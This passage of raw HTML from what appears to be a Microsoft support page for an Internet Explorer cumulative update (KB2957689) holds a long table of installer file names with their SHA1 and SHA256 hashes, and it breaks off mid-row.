you switch text direction in a webpage</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2960196\" id=\"kb-link-46\">2960196 </a></td><td class=\"sbody-td\">Date and time are incorrect in a web-based application that is rendered in Internet Explorer 11 or Internet Explorer 10 </td></tr></table></div></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File hash information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB2957689-x64.msu</td><td class=\"sbody-td\">6B4CA5D3103D618C50AE96CCE94034CA1126725A</td><td class=\"sbody-td\">57711313A6B752C835DF29F3503117941257151F8DF8EE95B1D6882ED52A1F19</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE10-Windows6.1-KB2957689-x86.msu</td><td class=\"sbody-td\">E1B4610A182AA863AAE65A8062065A83F0651560</td><td class=\"sbody-td\">C8B1AA341C56622297C8A784EEF6ACC46BD1C7D98EE5EA4D9DFDA46E06090902</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB2957689-x64.msu</td><td class=\"sbody-td\">4238E2B6193238ADCCB1C2A6BAA00EC1CD1E9889</td><td class=\"sbody-td\">D18D766F828B735AC51FD3EC79C9B95DFB63335EDD19E89DE5601B06963F030B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB2957689-x86.msu</td><td class=\"sbody-td\">BBFC7FA281F2686A81B28AE46273D0A050071432</td><td class=\"sbody-td\">F7FEEE2DE19F386C78581D364144268CB4664BB245E00D5DCBB610F4410B016D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB2963950-x64.msu</td><td class=\"sbody-td\">7CFE5F89848F3A6406E3BECFCA49DAFD14737E17</td><td class=\"sbody-td\">963B1E756824313E1749D4766D46A75298D90FCF08113C8BE9444F9BD7FF430F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE11-Windows6.1-KB2963950-x86.msu</td><td class=\"sbody-td\">4D3A7043CC62001B93619CEC59863AA40B0EBF5A</td><td class=\"sbody-td\">7305D5072A4B8A930E93FDDBAC991FE6DEFEAC46C204099F81BAB3650FEA14CA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-ia64-DEU.exe</td><td class=\"sbody-td\">A160F4BDA6662B0F7C1ACB001F6181DE462D4B29</td><td class=\"sbody-td\">F036054C93B6F1666D8B8AC6D7A866089144537862CDDE6438D3CE29AB1345F7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-ia64-ENU.exe</td><td class=\"sbody-td\">1DD666A0B519980AC08568E1A5CEAE22F943F604</td><td class=\"sbody-td\">94A25FF0205B64BDDD31BDA7C8B65D03B22F966C386DCDEC1F99FD6FAC3B1D83</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-ia64-FRA.exe</td><td class=\"sbody-td\">BB085355974483F8C42B90AB8E11436402FA5A91</td><td class=\"sbody-td\">4297988B01F134D215B4ED8BF9064129EDE30693681024033549BCF1431C0A59</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-ia64-JPN.exe</td><td class=\"sbody-td\">FB23A5F419D143B6F42D9CE494A712331DDA0D60</td><td class=\"sbody-td\">B27C1294AFDF7D166E5BD3C0BCDA4FA8B73B88B59945D679FC8CF418F9409372</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-CHS.exe</td><td class=\"sbody-td\">E9C28A2DB89D64C5C89585FEAE83CF11A688462B</td><td class=\"sbody-td\">33DC01859DC1BF416CCB4450586C8242796153F1369ECCABE9323AD7F0C12EA0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-CHT.exe</td><td class=\"sbody-td\">38849ACF0D6E4B83ABE260EFB7A4295DE2D41ABE</td><td class=\"sbody-td\">62C9FC1105E10234958A602129FBA2C9893D46ECD04188125DCDEB9EBD4EE0A0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-DEU.exe</td><td class=\"sbody-td\">D3C06CDD3557702D72090FB7C1B91D4C97C20BE3</td><td class=\"sbody-td\">BFD4B50356DE0D40FE015022EE4423569A39E27F6BCFA383609E8FBDB23ABF32</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-ENU.exe</td><td class=\"sbody-td\">34AF282F217CDB20BF64843844127A34EF861BD5</td><td class=\"sbody-td\">BF21F76AB5AAB326DEB067CD64315EE8605BECBD3DCF8DECF03758656146317F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-ESN.exe</td><td class=\"sbody-td\">01F0E3BC88C6411CA125168ACE6448420D1DE510</td><td class=\"sbody-td\">EBBF34552A705C4328E2341C4DB03E352477BE59A4CC7DEE37AB35513E8381ED</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-FRA.exe</td><td class=\"sbody-td\">ECDDB79B87FCCB2F6BD65FEC62D21499FB811F6A</td><td class=\"sbody-td\">5D37D53FC69C31F0636C916C323CEE2FA323AC07C67F56C550AB6B734E7E0B81</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-ITA.exe</td><td class=\"sbody-td\">F11A0DF33C0820504FC4A1D337102C0D72D3E455</td><td class=\"sbody-td\">28FB4D7A6317EB1A1D617D73854CAC744F80BC0BE880389A1D7C714E03AB0B4A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-JPN.exe</td><td class=\"sbody-td\">7BD3B6197DC8D5ACFDAC5A847813A491995F4EC3</td><td class=\"sbody-td\">02B1F7422D83F618316443D79DA7DCEB54113EF673273DC94F874F7673C82AD7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-KOR.exe</td><td class=\"sbody-td\">68142F70DEAC799791C2D4132B76CE65AE1D4718</td><td class=\"sbody-td\">AAB5A63503D9D5677F27F15CB88327DC6066C959552003B8865B68EEE09DFE61</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-PTB.exe</td><td class=\"sbody-td\">37B0A00F555AA57B6B4CCD2C9950C2749C1361C0</td><td class=\"sbody-td\">F81BBFFB1381789A2960B7D10566D7504364519687EDD4B998F901FDF16B7EB3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x64-RUS.exe</td><td class=\"sbody-td\">C8E45CD98EED18D1AC59666D7E5CF93A551E7A52</td><td class=\"sbody-td\">48165B3A848154E8817BE5C4BE03740F322B8DB4AEA951B238C0AF1A9B4A14D4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-CHS.exe</td><td class=\"sbody-td\">6841AD0B1AA17541017A84C358324375985BA5BA</td><td class=\"sbody-td\">D8D9FD130F3E3BD8EB180D32418273C076BB7ECFED8ADD36B4101FF0F223B19C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-CHT.exe</td><td class=\"sbody-td\">92BF38378ABA8A5A6267EA693C62754D0E0FED0A</td><td class=\"sbody-td\">0742B8BE34ED1F181D79A3348D7B1C1C31C5ED3824BC3309ADBACA8D2B82D06B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-CSY.exe</td><td class=\"sbody-td\">600E808ABC3D27FD0FB0298564D5AAE30748F1E9</td><td class=\"sbody-td\">9018C97E761A71EC436DCF41DF8F77398A65209C4F07EBDA4595B44DFA183176</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-DEU.exe</td><td class=\"sbody-td\">E17077F065FA1D06AD0F84539CD609A075B1B383</td><td class=\"sbody-td\">F8E67CA828166F0BA2EE09B009ABBB466DE4287A111ED249ADF153D648CF2D03</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-ENU.exe</td><td class=\"sbody-td\">6A3E7B9676D15EC81AEE261357757EE8F84E2C41</td><td class=\"sbody-td\">0F359E6039E9A88101825963EA1A13FEF2F1DA18099ED5E966C9D69A3CEF09CB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-ESN.exe</td><td class=\"sbody-td\">A6AA8A8737F5669924676BA5B6DB27560FB3A728</td><td class=\"sbody-td\">2235FFC338E1199037FCAC38F21C55E83F6E775B8F67A03645C557150B456604</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-FRA.exe</td><td class=\"sbody-td\">57DFB801BA8153E24B71586A7963DD98AE8B3DA0</td><td class=\"sbody-td\">3C2DDA9438C85A516B45A25FB4836AF81BA10EB1CFFDBF6CFAEF1D6C92899888</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-HUN.exe</td><td class=\"sbody-td\">39C50A4340FC6C190CBEC45BA2E25513FCBB3879</td><td class=\"sbody-td\">BCB5E7913378DBC62F01666DB523FDF44DE28E918E6CEC7E21C8E9BDAED71699</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-ITA.exe</td><td class=\"sbody-td\">CBF36470DA1BC28EFA2FAD87D11F392EC12CF493</td><td class=\"sbody-td\">D6D55A97A5A9AA8A408D5B10FD39A4D261AFC0C3E711A71780884BC08A6361AA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-JPN.exe</td><td class=\"sbody-td\">77D399A1E1A1DD1A3D8A1FA6C5D059BB9F7FCBB8</td><td class=\"sbody-td\">E6EE095BD6588783390BACE644168E2317094E24F04E64F77867C76B2EFD71EC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-KOR.exe</td><td class=\"sbody-td\">0BC9781D8A391067C5B985991AF94015B88DFD45</td><td class=\"sbody-td\">390AB6121B7357E4EFCAF5D93C042241A09AD30B213416037B58D738029C13AD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-NLD.exe</td><td class=\"sbody-td\">691BB5951F9073670205301586B6A6FF62DC8812</td><td class=\"sbody-td\">56A6281ABDEDFB0FFB3E52E1ECD5C80DD7226DD1D899A105B426EE824EC31050</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-PLK.exe</td><td class=\"sbody-td\">25E49822ACDB3CC47341047ADC6F686BA7CD757B</td><td class=\"sbody-td\">556BFB1435D1477FBF770841A7D25A8421C83ACE57CC9D34BF99672144EA8821</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-PTB.exe</td><td class=\"sbody-td\">869989BEF97FB6793D75E757E2985959F5B4FCE6</td><td class=\"sbody-td\">805184CE6ADCFD50C825FF0A4E254367B9B45554C2A9C670D6BC62775C6C9E33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-PTG.exe</td><td class=\"sbody-td\">ADFCB29EAD368533725370C03649B770B5531B8F</td><td class=\"sbody-td\">8737D47F5A412A5B6CF8FCE41CC19027352AB0942A68BCA31D84B3F3798D7013</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-RUS.exe</td><td class=\"sbody-td\">08FA43F661A335275D55F26F0CEE6B72D072CC20</td><td class=\"sbody-td\">526040422B682F50248A363A12CEC0CE5E59830F7FBFCD8C0FE813CA67C6F79D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-SVE.exe</td><td class=\"sbody-td\">4B03B1077B8D624C7339BB7A6583A7B03B49BD78</td><td class=\"sbody-td\">1D57AC99388D4D3A76BAF324AA624A615401A1B82E6F082C21A9F4E2B3F6C6E6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB2957689-x86-TRK.exe</td><td class=\"sbody-td\">2264374DEC73DF7911C2795B4AADEEE93E8720BE</td><td class=\"sbody-td\">A1610D004EF76DD9000460FB3B6EEF1C21E2DF0D10EC4E90183218096FED2635</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-ARA.exe</td><td class=\"sbody-td\">E21306374140C28AF448088FCC99D53697E6173F</td><td class=\"sbody-td\">6406A2BFAC0E2B8950487FB42E2C3A8E9E1C0456415356E85532061FBF2D2D0E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-CHS.exe</td><td class=\"sbody-td\">7217EE99C5C38445E74E515569F395E037751AAF</td><td class=\"sbody-td\">43162DEF1D8D3F8715C781D694D76A62B826B4F33E619F2052DC14AEA78B58C2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-CHT.exe</td><td class=\"sbody-td\">5903FEBFBB35817BA1635BACD1D5CC9BAFA6DF25</td><td class=\"sbody-td\">7F864A5D13C5CF57B828EF903BC983D616C74D9D6A34BDB74F4BC06ED51B91E6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-CSY.exe</td><td class=\"sbody-td\">9508F2E9C054FAC904479C2E3C0C1073D0240EFA</td><td class=\"sbody-td\">1DB90A5FAC7BE8896B21EDD4FD843A2C88055E1A1A2EEDEF392C5DA65F980696</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-DAN.exe</td><td class=\"sbody-td\">B47A457006A142D9A69C39BA1E25CAD8D336511A</td><td class=\"sbody-td\">659C38DF9552679A74EE09CB35FA06BB15034231F420AB2C3404EF8C554D8A3A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-DEU.exe</td><td class=\"sbody-td\">2A5E5887CFBC744E256C7F90C21E35C8F61D9D15</td><td class=\"sbody-td\">5F65668CE1858DCEC72FFDD10E755C807F70D354B1AE8A48852C5FAFB4B339C0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-ELL.exe</td><td class=\"sbody-td\">E63F73EBABFF8C0A461C5E631C05C4938733881D</td><td class=\"sbody-td\">AA03D732737F4BE194ED806DDDE381F09CD5A353B0934FBFBAA493F4BB97792D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-ENU.exe</td><td class=\"sbody-td\">5672F60BC1A8597BAE3688C11F09170C8A4F4EA0</td><td class=\"sbody-td\">A42D923E9299D536C89DEC59E57A2DA287CC22436842112D0FA82166194EF464</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-ESN.exe</td><td class=\"sbody-td\">78790334D4D0AB11ADE449956A8C9C5E273D9EAD</td><td class=\"sbody-td\">74B64DC3FB34AB89BD65E6EA57B3BB2069DA6F621386A3A820C36182EE1E5683</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-FIN.exe</td><td class=\"sbody-td\">E38841A8A014851233B8A2D55035C33C647D436D</td><td class=\"sbody-td\">F0036137EFFA97F03ACB13522968322F94904D4947F4658BBE71CE127486CCA5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-FRA.exe</td><td class=\"sbody-td\">03D0A57A6416061B0A6A91E9E0AADF77A96AB588</td><td class=\"sbody-td\">65BA1751F97D905461EEDB3C112EB102F5D7FC13F46666B6703A830164FE4464</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-HEB.exe</td><td class=\"sbody-td\">8B86FE0ED7C58CB648B2DF415DDF7C23A873A978</td><td class=\"sbody-td\">990243718D09EFBE60C40B875201B649879DD5E2C6C2D2FCAF5DB6334713D451</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-HUN.exe</td><td class=\"sbody-td\">2666829BD369DA27C56A08496BF8B4F4A420ACDA</td><td class=\"sbody-td\">B85818AF625CE3B96E23CFC824FB6B705618915A9C46B7EE6631C564703EF8FB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-ITA.exe</td><td class=\"sbody-td\">2A45ACEEF9117E404C87E9E5101CC42D6CB672F4</td><td class=\"sbody-td\">09640CA5C98C96FA430D3CD5A471E4A074798CF51AE9A7B0A5F6D92E606091E3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-JPN.exe</td><td class=\"sbody-td\">12AB9714A60DA24B95D2A9D189E2B12156D49B8F</td><td class=\"sbody-td\">0B715E7D1237B228E1374A195A60586B2201990DA299C3F337C71A25708C5A4D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-KOR.exe</td><td class=\"sbody-td\">87858C8CC9C0C47FAAF8682D3CB0140665AF883F</td><td class=\"sbody-td\">343A559C06F7337B3F07A7F957B50C32D6D989D20FA92A62EA071BA3CCE21AA8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-NLD.exe</td><td class=\"sbody-td\">0CF94E03A9D2DFAF187A5B3F41ADEFB184C52623</td><td class=\"sbody-td\">85E097DDA79E00C29978159808E4AA0F239B2425A859B227E0726323C391F1E5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-NOR.exe</td><td class=\"sbody-td\">587E003AF4B40B71D75795CEBB212BC65FE8D3F1</td><td class=\"sbody-td\">35A01C25AEC43BD55CB2F97A8BF3F345083CEE41635E43026B05B07ECC7A2B57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-PLK.exe</td><td class=\"sbody-td\">4789FC29C60B99149D44FB99047345CB5F33CFDC</td><td class=\"sbody-td\">5241A8677A42B8B19A980A97872C2DA0B9A5D8CD4626EEDE01C697770C1B70FD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-PTB.exe</td><td class=\"sbody-td\">CE80A13D7325BF653C2C1C15264B70F27B177A2F</td><td class=\"sbody-td\">E38B4FA6593FC7B71EDBC97E8F48F4FD421886C4255290A64924EC75CD2684E3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-PTG.exe</td><td class=\"sbody-td\">B7FD792C000DB63376F43206E01C0C0F647F3A35</td><td class=\"sbody-td\">ED27D8FD9C55D7E70B100C8F47AFDC98974863395F42B50A23A4DA491C4D8151</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-RUS.exe</td><td class=\"sbody-td\">042550372D1A70635D0DD9CB74C2391E9C80AAFA</td><td class=\"sbody-td\">F247C7A08C9043C113F1FBFF72B11EEED28496F8E6BB1B22E2EC9CAC785817F6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-SVE.exe</td><td class=\"sbody-td\">EFF65C95B870E8C3D22D49185735E6DA2A88A23B</td><td class=\"sbody-td\">C16825C7CDC1938D00B9AF318669D6E45382FD0C919460551953B7549583A029</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsXP-KB2957689-x86-Embedded-TRK.exe</td><td class=\"sbody-td\">5FE29BCE9C87C1661E061B41FB871E60AE614641</td><td class=\"sbody-td\">A091C5074B5B94CA640ED672AC3FB7367FEE1A85ED8045930605B66E8F7B1413</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-Windows6.0-KB2957689-x64.msu</td><td class=\"sbody-td\">D49944031D82834F89275C984712722FA5D72A45</td><td class=\"sbody-td\">CE32407E08921008DA8E601CE17D185EC5538B8DD97ABBFF90F2F304B6D3FE48</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-Windows6.0-KB2957689-x86.msu</td><td class=\"sbody-td\">8E4D2BF85B4E343CAD941F330DAFF1CA123C9245</td><td class=\"sbody-td\">5FA09E6EC9DF94EAFC54315DD2BF28AFB75D00E45E050E35629775E26A0D326B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-CHS.exe</td><td class=\"sbody-td\">65099F405DFBA41333B00D928966BA6748DA6A11</td><td class=\"sbody-td\">4389F3DB5F647568E85ED7B4B7FB1E36476A2EB40F37DCB3E0F55375C05308C7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-CHT.exe</td><td class=\"sbody-td\">0FB054972D7927BCC9D4373BB0DAA78D8C22BBE6</td><td class=\"sbody-td\">02CCFD79E0B43F074A4F9FAF5794E59E79B64C2F3ABD466650798148323BD298</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-DEU.exe</td><td class=\"sbody-td\">863C72313F49E3EFA00E1DAF95DA816E7E8B62A1</td><td class=\"sbody-td\">3671622FB715A36F3459F78C2C71164742BEDBBA04A70B8E0F18EE26FFF68006</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-ENU.exe</td><td class=\"sbody-td\">1BFC9C25BA0B2D62AB00F608CE6848833CB49012</td><td class=\"sbody-td\">B07C377328AF4147F9B680303A6C41E8BAEDF3D1BADEF03F16F9B4CA77756D93</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-ESN.exe</td><td class=\"sbody-td\">110D7827E540351306B996DE3FA5E90F3D88C502</td><td class=\"sbody-td\">DBBBB7E6E2916746FC9971B5BD7A8C5E853B7FABD015D125045B60493F638249</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-FRA.exe</td><td class=\"sbody-td\">21F5ADDDB357DC216950867DB1F205F0F65605BD</td><td class=\"sbody-td\">1CEBAD1ED57F57D88DEBA7ACB80CD9A83B1CF0113B4B3CEEBE977E8404E183F9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-ITA.exe</td><td class=\"sbody-td\">0E905EF048EB3EF8B61EDBD635C504EEA04E2CEE</td><td class=\"sbody-td\">E7979E76F7D1D4EF89D425182506982471E89C7906E17D970C5C073DF98D2D75</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-JPN.exe</td><td class=\"sbody-td\">FB45B971C4C69DEA04EDDC8DF1701A3DCC610323</td><td class=\"sbody-td\">5EA2ACD6E7E6696EA50CEF3A9DE18C92BFEC84A57CCC2F798A58719FA06AEF19</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-KOR.exe</td><td class=\"sbody-td\">4012638C90E95F7F0EA5F16D105695775EECDA91</td><td class=\"sbody-td\">714516999C45177E348D262577FB4A5EBE83D308545CD7E7383399395150EE99</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-PTB.exe</td><td class=\"sbody-td\">26966BACE81F7E64977D42F867CACA135D764A17</td><td class=\"sbody-td\">5786758B94543269DC61B4FD4688BFF01C17DB7A1E7B946E4718064A0D4BF499</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x64-RUS.exe</td><td class=\"sbody-td\">96B66B7A9FE95E0978A37677AC64FCCB61E8A731</td><td class=\"sbody-td\">FC2C57E68DA7343FC4B738555DB51D9BD12BF0055C583B1F6D76FD209397CEA7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-CHS.exe</td><td class=\"sbody-td\">9F24CA3F78FB14DDFDC42FA32CBB44792699CBC3</td><td class=\"sbody-td\">83370F5E4DB1286E30DAE129EFA90BCBBD6607CB800B685F2923B59D96A61551</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-CHT.exe</td><td class=\"sbody-td\">3ADC962D9EBABCC8A04C87CEB4C61AEA33C2D9CC</td><td class=\"sbody-td\">A2C69722FFA8A2016A764E3B2152FD9E6CBEDA7DD58CBFC171D67BAF72336863</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-CSY.exe</td><td class=\"sbody-td\">9722DADDF7A89FB80FC7B0259FBB23FDA351D2E4</td><td class=\"sbody-td\">6EC838966BAED9AC34CFC8408A035553ED296DE24DCC57AF9C9B9A254154B9B1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-DEU.exe</td><td class=\"sbody-td\">73D8D6568E3FA49F9208EDEF47E90B08666B42CC</td><td class=\"sbody-td\">C822D475484121654374784844E75C2FD0BC6BB3FD999296AFA95AD618EE91EE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-ENU.exe</td><td class=\"sbody-td\">5AB640D48544813403AB4FC1267EB02E6859F898</td><td class=\"sbody-td\">0AFF0EC10E3F93997FE6DC956E2C035599B9E29E3C617BDC7497E3C112729BAB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-ESN.exe</td><td class=\"sbody-td\">798236A6E55DD2BBA464C5ED4F6991D1E0DA3550</td><td class=\"sbody-td\">3C7308832EAE2A4976BA6FDCDDB08F9FFAFADE92918FE174FAB16BE9A08C451C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-FRA.exe</td><td class=\"sbody-td\">6B446AB4046B93C276B5BC6D305675AFA6E783DB</td><td class=\"sbody-td\">485C80F2478BB8A5E336590B6840024AD4163B3202EBEFF5A8837FB70E84CE5E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-HUN.exe</td><td class=\"sbody-td\">8C708D7DD2F190A2B0D9E8AFD618558CA92C877B</td><td class=\"sbody-td\">27D7B7F165AD16E1AEE9C541A5034A71F8F384C8AC452C57593EEF688AFB7529</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-ITA.exe</td><td class=\"sbody-td\">731C6C52125722E124086DE6220A085963AA5B48</td><td class=\"sbody-td\">4EA5DC786524B3CA40A7361CA909E0710D533F80F1A63F39A9BDBF1AE808A554</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-JPN.exe</td><td class=\"sbody-td\">51898BA3EB334D9DE248AA6E13705E7A472EDE16</td><td class=\"sbody-td\">6F70847504DAEB9DEA3D3C1D715C4AF09CAD06C751667B53BCD1596531CB9671</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-KOR.exe</td><td class=\"sbody-td\">10F409B462D112882EC2160B897EB56400A19D4F</td><td class=\"sbody-td\">6A0A62824118E367062A6E320C29442A13C709944AE046A5A9937FAB893CDA7E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-NLD.exe</td><td class=\"sbody-td\">D12068E434D70799A3AC81B1E3851E582D0BB962</td><td class=\"sbody-td\">00F1865C7C94AD7988EBE644F10A5ABA1D1B8EBD3EEA21BF1CE6BB1E51A37898</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-PLK.exe</td><td class=\"sbody-td\">8941CC435FBBFBEEB561BFAA4ECA3027F47BA730</td><td class=\"sbody-td\">0A0512129AFAD4B1103DE09A5863FEDE01ED0D9251A7D40DA2866A3A112AB5B0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB2957689-x86-PTB.exe</td><td 